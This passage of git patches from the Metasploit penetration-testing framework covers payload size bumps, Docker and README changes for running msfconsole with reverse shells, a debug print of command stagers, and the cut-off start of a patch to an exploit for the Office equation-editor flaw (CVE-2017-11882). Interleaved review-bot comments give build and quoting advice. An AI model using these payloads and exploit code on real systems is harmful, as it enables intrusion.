@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index d7d893c797..20d3b4aa74 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 856312 + CachedSize = 857808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 43922b34f8..d0fed27439 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 856312 + CachedSize = 857808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 28f1df859a..5c649a25c9 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 856312 + CachedSize = 857808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb index a568253314..679a3765fc 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb index 01adfad676..f33ddf8cbb 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb index 8f13d5b934..21eb56cde1 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 07d84a9546..0fb3aaea5e 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 745472 + CachedSize = 746944 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index 1b019f6ea9..6745bb5f9b 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 745472 + CachedSize = 746944 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index d039699b84..0cc26899f3 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 745472 + CachedSize = 746944 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index af7e1d5c24..c7da73f173 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 793296 + CachedSize = 794800 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 6ce43b87f7..ac313d906c 100644 
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 793296 + CachedSize = 794800 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 1f2fb19f4f..d72061e2cc 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 793296 + CachedSize = 794800 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index c678a47d9e..a129f3834a 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 905864 + CachedSize = 907360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 76be12d28d..9372c91415 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 905864 + CachedSize = 907360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 85223495a7..6e099ef231 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 905864 + CachedSize = 907360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index a8d519d10c..f1b9a907df 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 789068 + CachedSize = 793284 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index 07bb971461..264643fb7d 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 789068 + CachedSize = 793284 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index d1eeb5d196..a4d7677fd4 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx'
 module MetasploitModule
- CachedSize = 789068
+ CachedSize = 793284
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
From 035d1ef2c63b0729d2689e4599016b328493db69 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sat, 25 Nov 2017 18:21:57 -0600
Subject: [PATCH 208/254] bump payloads, pull in AES negotation & transport fixes
---
 Gemfile.lock | 4 ++--
 metasploit-framework.gemspec | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index dfcf9d1632..50977088a9 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -17,7 +17,7 @@ PATH
 metasploit-concern
 metasploit-credential
 metasploit-model
- metasploit-payloads (= 1.3.15)
+ metasploit-payloads (= 1.3.17)
 metasploit_data_models
 metasploit_payloads-mettle (= 0.2.8)
 msgpack
@@ -178,7 +178,7 @@ GEM
 activemodel (~> 4.2.6)
 activesupport (~> 4.2.6)
 railties (~> 4.2.6)
- metasploit-payloads (1.3.15)
+ metasploit-payloads (1.3.17)
 metasploit_data_models (2.0.15)
 activerecord (~> 4.2.6)
 activesupport (~> 4.2.6)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 49feede5fa..cb469296e6 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
 # are needed when there's no database
 spec.add_runtime_dependency 'metasploit-model'
 # Needed for Meterpreter
- spec.add_runtime_dependency 'metasploit-payloads', '1.3.15'
+ spec.add_runtime_dependency 'metasploit-payloads', '1.3.17'
 # Needed for the next-generation POSIX Meterpreter
 spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8'
 # Needed by msfgui and other rpc components
From 50351320d779389ff911ccf72e26d73dba5c952f Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer
Date: Tue, 28 Nov 2017 21:35:20 +0100
Subject: [PATCH 209/254] more docker work
---
 .dockerignore | 2 +-
 .gitignore | 1 +
 Dockerfile | 14 +++---
 ...verride.yml => docker-compose.override.yml | 5 +-
 docker-compose.yml | 9 ++--
 docker/README.md | 48 ++++++-------
 docker/bin/msfconsole | 10 ++--
 docker/bin/msfconsole-dev | 27 -----------
 docker/bin/msfvenom | 14 ++++--
 docker/bin/msfvenom-dev | 26 ----------
 lib/msf/ui/console/command_dispatcher/db.rb | 2 +
 11 files changed, 49 insertions(+), 109 deletions(-)
 rename docker/docker-compose.development.override.yml => docker-compose.override.yml (78%)
 delete mode 100755 docker/bin/msfconsole-dev
 delete mode 100755 docker/bin/msfvenom-dev
diff --git a/.dockerignore b/.dockerignore
index a066428ead..b6add3b6e4 100644
--- a/.dockerignore
+++ b/.dockerignore
@@ -34,7 +34,7 @@ config/database.yml
 # target config file for testing
 features/support/targets.yml
 # simplecov coverage data
-coverage
+coverage/
 doc/
 external/source/meterpreter/java/bin
 external/source/meterpreter/java/build
diff --git a/.gitignore b/.gitignore
index 233af3374f..8398940932 100644
--- a/.gitignore
+++ b/.gitignore
@@ -88,6 +88,7 @@ data/meterpreter/ext_server_pivot.*.dll
 # local docker compose overrides
 docker-compose.local*
+.env
 # Ignore python bytecode
 *.pyc
diff --git a/Dockerfile b/Dockerfile
index e4cfb5517e..f6c0007042 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,14 +1,17 @@
 FROM ruby:2.4.2-alpine
-MAINTAINER Rapid7
+LABEL maintainer="Rapid7"
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
 ENV APP_HOME /usr/src/metasploit-framework/
 ENV MSF_USER msf
 ENV NMAP_PRIVILEGED=""
+ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME
-COPY Gemfile* m* Rakefile $APP_HOME
-COPY lib $APP_HOME/lib
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
+COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
+COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
+COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
 RUN apk update && \
 apk add \
@@ -36,8 +39,7 @@ RUN apk update && \
 ncurses-dev \
 git \
 && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
- # this currently fails: https://github.com/rubygems/rubygems/issues/2064
- # && gem update --system \
+ && gem update --system \
 && gem install bundler \
 && bundle install --system $BUNDLER_ARGS \
 && apk del .ruby-builddeps \
@@ -46,7 +48,7 @@ RUN apk update && \
 RUN adduser -g msfconsole -D $MSF_USER
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
-RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip /usr/bin/nmap
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
 USER $MSF_USER
diff --git a/docker/docker-compose.development.override.yml b/docker-compose.override.yml
similarity index 78%
rename from docker/docker-compose.development.override.yml
rename to docker-compose.override.yml
index f4ac60633a..134c1e8503 100644
--- a/docker/docker-compose.development.override.yml
+++ b/docker-compose.override.yml
@@ -1,13 +1,14 @@
-version: '2'
+version: '3'
 services:
 ms:
 build:
+ context: .
+ dockerfile: ./Dockerfile
 args:
 BUNDLER_ARGS: --jobs=8
 image: metasploit:dev
 environment:
 DATABASE_URL: postgres://postgres@db:5432/msf_dev
-
 volumes:
 - .:/usr/src/metasploit-framework
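Review bot: `&& gem update --system \` in the second Dockerfile hunk installs whichever RubyGems release is current at build time, and the following `&& gem install bundler \` is likewise unpinned, so two builds of the same commit can produce different toolchains even though the base image is pinned to `ruby:2.4.2-alpine`. For a reproducible, auditable image pin both, e.g. `&& gem update --system <RUBYGEMS_VERSION> \` and `&& gem install bundler -v <BUNDLER_VERSION> \` (placeholders). The removed comment explained why the update had been disabled; a one-line note that the upstream issue is resolved would spare the next reader the same investigation. The RUN instruction these lines belong to begins above the hunk.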
diff --git a/docker-compose.yml b/docker-compose.yml
index 0f433b31fe..725f398500 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -1,10 +1,7 @@
-version: '2'
+version: '3'
 services:
 ms:
- image: metasploit
- build:
- context: .
- dockerfile: ./Dockerfile
+ image: metasploitframework/metasploit-framework:latest
 environment:
 DATABASE_URL: postgres://postgres@db:5432/msf
 links:
@@ -16,7 +13,7 @@ services:
 - /etc/localtime:/etc/localtime:ro
 db:
- image: postgres:9-alpine
+ image: postgres:10-alpine
 volumes:
 - pg_data:/var/lib/postgresql/data
diff --git a/docker/README.md b/docker/README.md
index a137b8c327..cec9d02070 100644
--- a/docker/README.md
+++ b/docker/README.md
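Review bot: `image: metasploitframework/metasploit-framework:latest` replaces the local `build:` with a floating registry tag, so `docker-compose run` picks up whatever `latest` resolves to at pull time and the deployed code changes silently between runs; `postgres:10-alpine` in the second hunk floats the same way, though only within a major version. Pinning to a release tag or a digest, e.g. `image: metasploitframework/metasploit-framework@sha256:<DIGEST>` (placeholder), keeps the running image auditable while the override file still supplies the local build for development. The `ms` service block continues outside the hunk.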
@@ -3,43 +3,36 @@
 To run `msfconsole`
 ```bash
+docker-compose build
 docker-compose run --rm --service-ports ms
 ```
+or
+```bash
+./docker/bin/msfconsole
+```
 To run `msfvenom`
 ```bash
-docker-compose run --rm ms ./msfvenom
+docker-compose build
+docker-compose run --rm --no-deps ms ./msfvenom
 ```
-
-### I don't like typing `docker-compose --rm ...`
-
-We have included some binstubs `./bin`, you can symlink them to your path.
-
-Assuming you have `$HOME/bin`, and it's in your `$PATH`. You can run this from the project root:
-
+or
 ```bash
-ln -s `pwd`/docker/bin/msfconsole $HOME/bin/
-ln -s `pwd`/docker/bin/msfvenom $HOME/bin/
+./docker/bin/msfvenom
 ```
-If you set the environment variable `MSF_BUILD` the container will be rebuilt.
-
-```bash
-MSF_BUILD=1 ./docker/bin/msfconsole
-MSF_BUILD=1 ./docker/bin/msfconsole-dev
-```
+You can pass any command line arguments to the binstubs or the docker-compose command and they will be passed to `msfconsole` or `msfvenom`. If you need to rebuild an image (for example when the Gemfile changes) you need to build the docker image using `docker-compose build` or supply the `--rebuild` parameter to the binstubs.
 ### But I want reverse shells...
-By default we expose port `4444`. You'll need to set `LHOST` to be a hostname/ip
-of your host machine.
+By default we expose port `4444`. If you want to expose more ports, or have `LHOST` prepopulated with a specific value; you'll need to setup a local docker-compose override for this.
-Create `docker/docker-compose.local.override.yml` with:
+Create `docker-compose.local.override.yml` with:
 ```yml
-version: '2'
+version: '3'
 services:
 ms:
 environment:
@@ -56,19 +49,6 @@ Now you need to set the `COMPOSE_FILE` environment variable to load your local
 override.
 ```bash
-echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.local.override.yml" >> .env
+echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
 ```
 Now you should be able get reverse shells working
-
-## Developing
-
-To setup you environment for development, you need to add `docker/docker-compose.development.override.yml`
-to your `COMPOSE_FILE` environment variable.
-
-If you don't have a `COMPOSE_FILE` environment variable, you can set it up with this:
-
-```bash
-echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.development.override.yml" >> .env
-```
-
-Alternatively you can also use the `msfconsole-dev` binstub.
diff --git a/docker/bin/msfconsole b/docker/bin/msfconsole
index a6b0b722f7..b85d150546 100755
--- a/docker/bin/msfconsole
+++ b/docker/bin/msfconsole
@@ -19,8 +19,12 @@ fi
 cd $MSF_PATH
-if [[ -n "$MSF_BUILD" ]]; then
- docker-compose -f $MSF_PATH/docker-compose.yml build
+PARAMS="$@"
+
+if [[ $PARAMS == *"--rebuild"* ]]; then
+ echo "Rebuilding image"
+ docker-compose build
+ exit $?
 fi
-docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"
+docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
diff --git a/docker/bin/msfconsole-dev b/docker/bin/msfconsole-dev
deleted file mode 100755
index 69cf879975..0000000000
--- a/docker/bin/msfconsole-dev
+++ /dev/null
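Review bot: `PARAMS="$@"` in the docker/bin/msfconsole hunk flattens all arguments into one string, and `"$PARAMS"` then hands `msfconsole` a single argument, so a call like `./docker/bin/msfconsole -q -x 'db_status'` no longer arrives as separate options; the `--rebuild` test is also a substring match that fires on that text anywhere inside any argument. Keeping the arguments as an array preserves both: `PARAMS=("$@")`, `if [[ " ${PARAMS[*]} " == *" --rebuild "* ]]; then`, and `docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "${PARAMS[@]}"`. The docker/bin/msfvenom hunk on the next line has the identical pattern and needs the same change, since its quoted option values break the same way.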
@@ -1,27 +0,0 @@
-#! /bin/bash
-
-if [[ -z "$MSF_PATH" ]]; then
- path=`dirname $0`
-
- # check for ./docker/msfconsole.rc
- if [[ ! -f $path/../msfconsole.rc ]] ; then
-
- # we are not inside the project
- realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
-
- # determine script path
- pushd $(dirname $(realpath $0)) > /dev/null
- path=$(pwd)
- popd > /dev/null
- fi
- MSF_PATH=$(dirname $(dirname $path))
-fi
-
-cd $MSF_PATH
-
-if [[ -n "$MSF_BUILD" ]]; then
- docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
-fi
-
-docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"
-
diff --git a/docker/bin/msfvenom b/docker/bin/msfvenom
index 3efc05168d..dd0f96cd49 100755
--- a/docker/bin/msfvenom
+++ b/docker/bin/msfvenom
@@ -17,9 +17,15 @@ if [[ -z "$MSF_PATH" ]]; then
 MSF_PATH=$(dirname $(dirname $path))
 fi
-if [[ -n "$MSF_BUILD" ]]; then
- docker-compose -f $MSF_PATH/docker-compose.yml build
+cd $MSF_PATH
+
+PARAMS="$@"
+
+if [[ $PARAMS == *"--rebuild"* ]]; then
+ echo "Rebuilding image"
+ docker-compose build
+ exit $?
 fi
-cd $MSF_PATH
-docker-compose run --rm --service-ports ms ./msfvenom "$@"
+# we need no database here
+docker-compose run --rm --no-deps ms ./msfvenom "$PARAMS"
diff --git a/docker/bin/msfvenom-dev b/docker/bin/msfvenom-dev
deleted file mode 100755
index 32b1049748..0000000000
--- a/docker/bin/msfvenom-dev
+++ /dev/null
@@ -1,26 +0,0 @@
-#! /bin/bash
-
-if [[ -z "$MSF_PATH" ]]; then
- path=`dirname $0`
-
- # check for ./docker/msfconsole.rc
- if [[ ! -f $path/../msfconsole.rc ]] ; then
-
- # we are not inside the project
- realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
-
- # determine script path
- pushd $(dirname $(realpath $0)) > /dev/null
- path=$(pwd)
- popd > /dev/null
- fi
- MSF_PATH=$(dirname $(dirname $path))
-fi
-
-cd $MSF_PATH
-
-if [[ -n "$MSF_BUILD" ]]; then
- docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
-fi
-
-docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index e37a16a350..edccdb50cd 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -1826,6 +1826,8 @@ class Db
 if (path)
 auth, dest = path.split('@')
 (dest = auth and auth = nil) if not dest
+ # remove optional scheme in database url
+ auth = auth.sub(/^\w+:\/\//, "") if auth
 res[:user],res[:pass] = auth.split(':') if auth
 targ,name = dest.split('/')
 (name = targ and targ = nil) if not name
From 0d38b7076390825a4b1a97afd25788e0907529ca Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer
Date: Tue, 28 Nov 2017 21:59:26 +0100
Subject: [PATCH 210/254] make travis build the image again
---
 .travis.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.travis.yml b/.travis.yml
index ffcbff526b..5d4166a1b4 100644
--- a/.travis.yml
+++ b/.travis.yml
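Review bot: `auth = auth.sub(/^\w+:\/\//, "") if auth` in the db.rb hunk anchors with `^`, which in Ruby matches at the start of any line rather than the start of the string, and the escaped slashes obscure what is being stripped; `auth = auth.sub(%r{\A\w+://}, '') if auth` states the intent — drop one leading scheme — exactly. The method this sits in starts and ends outside the hunk, so it is not visible here whether `path` is guaranteed to be a single line before it is split.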
@@ -25,7 +25,7 @@ matrix:
 jobs:
 # build docker image
 include:
- - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
+ - env: CMD="docker-compose build" DOCKER="true"
 # we do not need any setup
 before_install: skip
 install: skip
From 7b3bf85d0315988c0525194606c57d4c8d45ab67 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 28 Nov 2017 16:00:28 -0600
Subject: [PATCH 211/254] Print the generated command stager for debugging
---
 lib/msf/core/exploit/cmdstager.rb | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 11c29a5c32..59e77b92f2 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -137,6 +137,8 @@ module Exploit::CmdStager
 raise ArgumentError, 'The command stager could not be generated'
 end
+
+ vprint_status("Generated command stager: #{cmd_list.join}")
+
 cmd_list
 end
From f132c1572f251848472031ee28086cf9e671e179 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 28 Nov 2017 17:15:56 -0600
Subject: [PATCH 212/254] Fix #9194, clarified error for reloading modules
---
 lib/msf/ui/console/command_dispatcher/modules.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb
index a7a8c806f8..bbb1993c29 100644
--- a/lib/msf/ui/console/command_dispatcher/modules.rb
+++ b/lib/msf/ui/console/command_dispatcher/modules.rb
@@ -99,7 +99,7 @@ module Msf
 print_status("Reloading #{path}")
 load path
 else
- print_error('Only Ruby files can be reloaded')
+ print_error('Only Ruby files can be reloaded (use reload/rerun for modules)')
 end
 else
 print_error('Nothing to edit -- try using a module first.')
From cb7f173811af79d7b8393bd2cfa33a46488e7e1f Mon Sep 17 00:00:00 2001
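Review bot: `vprint_status("Generated command stager: #{cmd_list.join}")` in the cmdstager.rb hunk joins the elements with no separator, so if `cmd_list` holds one command per element (as the name suggests, though the construction is outside the hunk) the debug output runs them together and the boundaries cannot be recovered when reading a log; `cmd_list.join("\n")` or `cmd_list.inspect` keeps them distinct. A short comment such as `# verbose only: the full stager text lands in the console log` would also make the logging intent explicit for whoever later tunes log verbosity. The method this line belongs to begins above the hunk.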
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 28 Nov 2017 21:36:25 -0500
Subject: [PATCH 213/254] Update office_ms17_11882.rb
---
 .../windows/fileformat/office_ms17_11882.rb | 160 +++++++++++-------
 1 file changed, 103 insertions(+), 57 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index f87d1032fb..47d486f734 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
 include Msf::Exploit::Remote::HttpServer
 include Msf::Exploit::Powershell
 include Msf::Exploit::EXE
+ include Msf::Exploit::FILEFORMAT
 def initialize(info = {})
@@ -38,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Payload' => {
 'DisableNops' => true
 },
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
 'DefaultOptions' => {
 'EXITFUNC' => 'thread',
 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
@@ -55,54 +57,107 @@ class MetasploitModule < Msf::Exploit::Remote header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' - header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' - header << '0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 